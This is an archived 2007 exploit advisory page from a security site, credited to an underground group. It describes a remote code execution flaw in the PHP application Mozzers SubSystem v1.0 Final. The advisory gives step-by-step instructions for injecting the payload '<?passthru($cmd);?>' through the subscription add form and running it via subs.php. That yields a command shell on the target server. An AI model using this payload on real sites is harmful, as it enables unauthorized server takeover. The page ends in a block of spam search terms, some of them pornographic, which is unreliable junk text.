about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Mozzers SubSystem final (subs.php) Remote Code Execution Vulnerability



2007-04-18 Mozzers SubSystem final (subs.php) Remote Code Execution Vulnerability
Rated as : High Risk

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                         
                                        +
+                                               Y! Underground Group      
                                        +
+                                                                         
                                        +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                         
                                        +
+          Portal......:  Mozzers SubSystem v1.0 Final                    
                                        +
+          Author......:  Dj7xpl / Dj7xpl@Yahoo.com                       
                                        +
+          Type........:  Remote Code Execution Vulnerability             
                                        +
+          Download....:  http://sourceforge.net/projects/subsystem/      
                                        +
+          Page........:  http://Dj7xpl.2600.ir                           
                                        +
+                                                                         
                                        +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                         
                                        +
+          Bug.........:                                                  
                                        +
+                         (1) Open Target By Browser :
http://[Target]/[Path]/index.php?page=add                   +
+                         (2) Insert Bad Code Into (Sub-name) Or (Sub-url)
 E.g  :<?passthru($cmd);?>              +
+                         (3) See Your Bad Code      :
http://[Target]/[Path]/subs.php                             +
+                                                                         
                                        +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

securitydot.net - 2007-04-18

Advertising

Copyright 2007, SecurityDot
Fri, 05 Dec 2008 18:04:47 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
booty t349t www kamasu booty sexclusive mambo Remo SECURITY F www.asians Searching booty vide booty vide search/exp xxx.vedio. wordpress Www.indian over News Searc Sexkorea c global ann News Searc all cartoo WWW.XXXX.c CMS is Fre /search/ex Sel Sabdrimer Sabdrimer Www 89 com t417t Wap.video. mambo Remo www.xstrea freebsd 7 arabic fre Sex banjbr mompoy t358t 200 /compo Porm IMAP4rev1 t662t t249t kayla+klee t249t news for c 3d sex gam WAP.WORLDS Script t133t t823t